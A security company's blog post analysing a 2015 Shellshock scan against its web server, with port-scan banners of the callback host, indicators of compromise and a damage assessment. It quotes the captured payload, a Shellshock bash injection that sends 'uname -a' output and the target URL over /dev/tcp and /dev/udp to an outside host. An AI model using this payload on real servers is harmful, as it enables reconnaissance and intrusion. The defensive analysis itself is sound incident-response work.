Analecta Cyber Company Blog: Possible Compromised Host Scanning for Shellshock


Possible Compromised Host Scanning for Shellshock


At 2015-03-12T03:00:44 a scan originated from IP address (1&1 Internet AG, associated with domain ONLINEHOME-SERVER.INFO) attempting to exploit the 2014 Shellshock vulnerabiliy (CVE-2014-6271). If successful, the payload commands would have created multiple reverse TCP and UDP connections to a second IP address in attempts to extract detailed information likely to be used for further compromise.


The remote attacker attempted to access a Common Gateway Interface (CGI) script named "test-cgi" located within the default "cgi-bin" directory on the web server. GET /cgi-bin/test-cgi The Referrer string and the User Agent string supplied contains the exploit and the "payload" - in this case initial scouting code.

 () { :;}; 
/bin/bash -c \"
    echo DOMAIN-REDACTED.COM/cgi-bin/test-cgi > /dev/tcp/; 
    /bin/uname -a > /dev/tcp/; 
    echo DOMAIN-REDACTED.COM/cgi-bin/test-cgi > /dev/udp/
Formatted for readability

Origin IP Address 
Registered by: 1&1 Internet AG 

Other IP Addresses

The "scouting" code as I've dubbed it here attempts to contact a second IP address: 
Registered by: AMEN Networks, France (RIPE)
Associated domain: None. 

At the time of this report a proxied port scan was used to enumerate ports open on and associated banners: 

FTP - 21 220 ProFTPD 1.3.2e Server (ProFTPD) [] 

SMTP - 25 220 ESMTP 

HTTP - 80 HTTP/1.1 200 OK Date: Mon, 23 Mar 2015 01:22:23 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Tue, 21 Jan 2014 08:24:28 GMT ETag: "103d80ca-1a4d-4f076bc9c2700" Accept-Ranges: bytes Content-Length: 6733 Connection: close Content-Type: text/html 

POP3 - 110 +OK Hello there. <36079 data-blogger-escaped-.1427073743="" data-blogger-escaped-localhost.localdomain=""> 

IMAP - 143 * OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS] Courier-IMAP ready. Copyright 1998-2004 Double Precision, Inc. See COPYING for distribution information. * BYE Disconnected for inactivity

Indicators of Compromise

  • Connections to or from or 
  • Outbound TCP connections to on port 23. 
  • Outbound UDP connections to on port 80.

Damage Assessment

No damage was sustained by the server from these requests. If the attack had been successful the victim should expect secondary connections once it's established the server is vulnerable to the CVE-2014-6271 (Shellshock) vulnerability. The intruder would have the privileges of the running web server user. It's likely the attacker would create a secondary method of access and/or attempt to escalate to a more privileged user account. Because the attacker uses the uname tool to identify the specific kernel type and version we assess this is a slightly more sophisticated attack methodology than seen with other common "Shellshock" attacks.

It is important to note that the registered owner of the IP addresses involved in this attack may be victims of a network incident. It is possible in many cases that the IP addresses identified from an incident are owned by one person or organization but are under the control of an unauthorized user. 

No comments :

Post a Comment